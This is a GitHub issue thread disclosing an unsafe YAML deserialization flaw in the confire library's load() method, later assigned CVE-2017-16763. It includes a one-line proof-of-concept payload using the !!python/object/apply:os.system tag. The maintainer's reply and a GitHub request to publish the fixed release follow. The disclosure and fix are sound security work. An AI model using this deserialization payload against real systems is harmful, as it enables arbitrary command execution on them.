load() method in class Configuration is vulnerable

[Joel-MalwareBenchmark]

class MyConfig(Configuration):
mysetting = True
logpath = "/var/log/myapp.log"
appname = "MyApp"
settings = MyConfig.load()
#CONF_PATHS = [
#'/etc/confire.yaml', # The global configuration
#os.path.expanduser('~/.confire.yaml'), # User specific configuration
#os.path.abspath('conf/confire.yaml') # Local directory configuration]

#'~/.confire.yaml':!!python/object/apply:os.system ["calc.exe"]

Hi, there is a vulnerability in load() method in config.py, please see PoC above. It can execute arbitrary python commands resulting in command execution.

[bbengfort]

Thanks for your note this has been fixed in 8cc86a5

[laserlemon]

@bbengfort 👋 Hello! I'm on the GitHub team responsible for sending security alerts for vulnerable versions of Python libraries. I see that you have fix commits for this issue (CVE-2017-16763) at 8cc86a5 and 70d3e3f on the develop and master branches, and that 2d52a5d bumps the version to 0.3.0, but I don't see a corresponding version in PyPI nor a release/tag.

We plan to alert users of confire for all current versions (<= 0.2.0) today and would like to offer remediation steps. If you're able, please release version 0.3.0 and we will delay our alerts until after the fix is released. Thank you! 👏